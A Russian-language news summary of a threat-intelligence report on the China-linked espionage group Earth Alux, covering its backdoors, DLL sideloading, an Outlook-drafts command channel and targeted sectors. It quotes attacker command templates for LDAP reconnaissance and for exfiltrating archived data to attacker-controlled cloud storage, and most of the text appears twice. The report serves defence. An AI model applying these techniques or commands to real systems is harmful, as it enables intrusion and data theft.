Группа Earth Alux, ассоциированная с Китаем, демонстрирует высокий уровень технических возможностей в области кибершпионажа. Непрерывный мониторинг Trend Research выявил первые случаи активности в регионе APAC во втором квартале 2023 года, а к середине 2024 года наблюдались новые инциденты в Латинской Америке, включая Бразилию.
Атаки начинаются с эксплуатации уязвимых сервисов на публично доступных серверах. Злоумышленники внедряют веб-оболочки, такие как GODZILLA, что позволяет им установить контрольные точки в системах жертв и задать начальную фазу проникновения.
Основным инструментом для обеспечения постоянного доступа является задняя дверь VARGEIT. На первом этапе эксплуатация происходит через инъекцию shellcode с помощью отладочного скрипта, при этом утилита cdb.exe переименовывается в fontdrvhost.exe, что соответствует методике LOLBAS. На последующих этапах применяется DLL-сайдлоадинг с использованием компонентов RAILLOAD для загрузки полезного кода и RAILSETTER, обеспечивающего установку, корректировку путей файлов и timestomping.
В качестве альтернативы VARGEIT используется backdoor COBEACON, выполняющий функцию первой стадии инфицирования. Загрузка осуществляется с помощью MASQLOADER, который применяет DLL-сайдлоадинг зашифрованного полезного кода с использованием замены символов, а также Rust-базированной утилитой RSBINJECT, позволяющей запускать shellcode напрямую без дополнительных процедур дешифровки.
Управление заражёнными системами происходит через командно-управляющий канал, основанный на Graph API для работы с данными Outlook. Сообщения, отправляемые из контролирующего сервера, имеют префикс «r_» и содержат уникальный идентификатор, сгенерированный по алгоритму fnv-1a x64 на основе случайного GUID, а шифруются с помощью AES-128 CBC, сжимаются zlib и кодируются в base64. Передача данных осуществляется через Outlook-черновики, что позволяет удалять сообщения после обработки и скрывать следы операций.
Для реализации инъекций кода VARGEIT использует запуск экземпляра mspaint, посредством которого производится вызов функций RtlCreateUserThread, VirtualAllocEx и WriteProcessMemory. При выполнении командной строки утилита создаёт каналы для захвата вывода, а для интерактивных операций задействуется именованный канал, обеспечивая точное взаимодействие с заражённой системой.
Фазы разведки, сбора и эксфильтрации данных включают использование специализированных команд, например «exe sElf98RqkF ldap <IP> <AD Domain> <machine AD domain>», что порождает файловую структуру с данными о пользователях, DNS-записях и групповых политиках. Полученные данные архивируются в ZIP-файлы (например, _20241111062500.zip, сохранённые в c:\programdata\data) и отправляются с помощью команд наподобие «exe gWgGfsq1PcUUoo <region> <bucket name> <ID> <secret> <expire time> dm9TTlEwM0NXRkF3TXRkM3RVSHg3SGQ3TDl4YVNRNGY= <path of data for exfiltration>» на контролируемые злоумышленниками облачные ресурсы.
Регулярное тестирование инструментов и методов – неотъемлемая часть деятельности Earth Alux. С помощью RAILLOAD и RAILSETTER проводятся проверки на обнаружение, экспериментируется с новыми хостами для DLL-сайдлоадинга, а также используются инструменты ZeroEye, CloneExportTable и VirTest для анализа импортных и экспортных таблиц EXE-файлов и модификации кода с целью обхода систем обнаружения.
Приоритетными целевыми секторами остаются государственные учреждения, технологические компании, логистика, производство, телекоммуникации, ИТ-услуги и розничная торговля. В фокусе операций – страны Тихоокеанского региона: Таиланд, Филиппины, Малайзия и Тайвань, а также активность в Латинской Америке, где наблюдаются основные кибершпионские атаки. Усиленные меры безопасности, регулярное обновление программного обеспечения и постоянный мониторинг сетевого трафика являются критически важными для защиты от данных угроз. Использование аналитических решений, таких как Threat Insights и системы Trend Cybertron, позволяет снизить риск ransomware на 92% и сократить время обнаружения инцидентов на 99%.
Изображение носит иллюстративный характер
Атаки начинаются с эксплуатации уязвимых сервисов на публично доступных серверах. Злоумышленники внедряют веб-оболочки, такие как GODZILLA, что позволяет им установить контрольные точки в системах жертв и задать начальную фазу проникновения.
Основным инструментом для обеспечения постоянного доступа является задняя дверь VARGEIT. На первом этапе эксплуатация происходит через инъекцию shellcode с помощью отладочного скрипта, при этом утилита cdb.exe переименовывается в fontdrvhost.exe, что соответствует методике LOLBAS. На последующих этапах применяется DLL-сайдлоадинг с использованием компонентов RAILLOAD для загрузки полезного кода и RAILSETTER, обеспечивающего установку, корректировку путей файлов и timestomping.
В качестве альтернативы VARGEIT используется backdoor COBEACON, выполняющий функцию первой стадии инфицирования. Загрузка осуществляется с помощью MASQLOADER, который применяет DLL-сайдлоадинг зашифрованного полезного кода с использованием замены символов, а также Rust-базированной утилитой RSBINJECT, позволяющей запускать shellcode напрямую без дополнительных процедур дешифровки.
Управление заражёнными системами происходит через командно-управляющий канал, основанный на Graph API для работы с данными Outlook. Сообщения, отправляемые из контролирующего сервера, имеют префикс «r_» и содержат уникальный идентификатор, сгенерированный по алгоритму fnv-1a x64 на основе случайного GUID, а шифруются с помощью AES-128 CBC, сжимаются zlib и кодируются в base64. Передача данных осуществляется через Outlook-черновики, что позволяет удалять сообщения после обработки и скрывать следы операций.
Для реализации инъекций кода VARGEIT использует запуск экземпляра mspaint, посредством которого производится вызов функций RtlCreateUserThread, VirtualAllocEx и WriteProcessMemory. При выполнении командной строки утилита создаёт каналы для захвата вывода, а для интерактивных операций задействуется именованный канал, обеспечивая точное взаимодействие с заражённой системой.
Фазы разведки, сбора и эксфильтрации данных включают использование специализированных команд, например «exe sElf98RqkF ldap <IP> <AD Domain> <machine AD domain>», что порождает файловую структуру с данными о пользователях, DNS-записях и групповых политиках. Полученные данные архивируются в ZIP-файлы (например, _20241111062500.zip, сохранённые в c:\programdata\data) и отправляются с помощью команд наподобие «exe gWgGfsq1PcUUoo <region> <bucket name> <ID> <secret> <expire time> dm9TTlEwM0NXRkF3TXRkM3RVSHg3SGQ3TDl4YVNRNGY= <path of data for exfiltration>» на контролируемые злоумышленниками облачные ресурсы.
Регулярное тестирование инструментов и методов – неотъемлемая часть деятельности Earth Alux. С помощью RAILLOAD и RAILSETTER проводятся проверки на обнаружение, экспериментируется с новыми хостами для DLL-сайдлоадинга, а также используются инструменты ZeroEye, CloneExportTable и VirTest для анализа импортных и экспортных таблиц EXE-файлов и модификации кода с целью обхода систем обнаружения.
Приоритетными целевыми секторами остаются государственные учреждения, технологические компании, логистика, производство, телекоммуникации, ИТ-услуги и розничная торговля. В фокусе операций – страны Тихоокеанского региона: Таиланд, Филиппины, Малайзия и Тайвань, а также активность в Латинской Америке, где наблюдаются основные кибершпионские атаки. Усиленные меры безопасности, регулярное обновление программного обеспечения и постоянный мониторинг сетевого трафика являются критически важными для защиты от данных угроз. Использование аналитических решений, таких как Threat Insights и системы Trend Cybertron, позволяет снизить риск ransomware на 92% и сократить время обнаружения инцидентов на 99%.
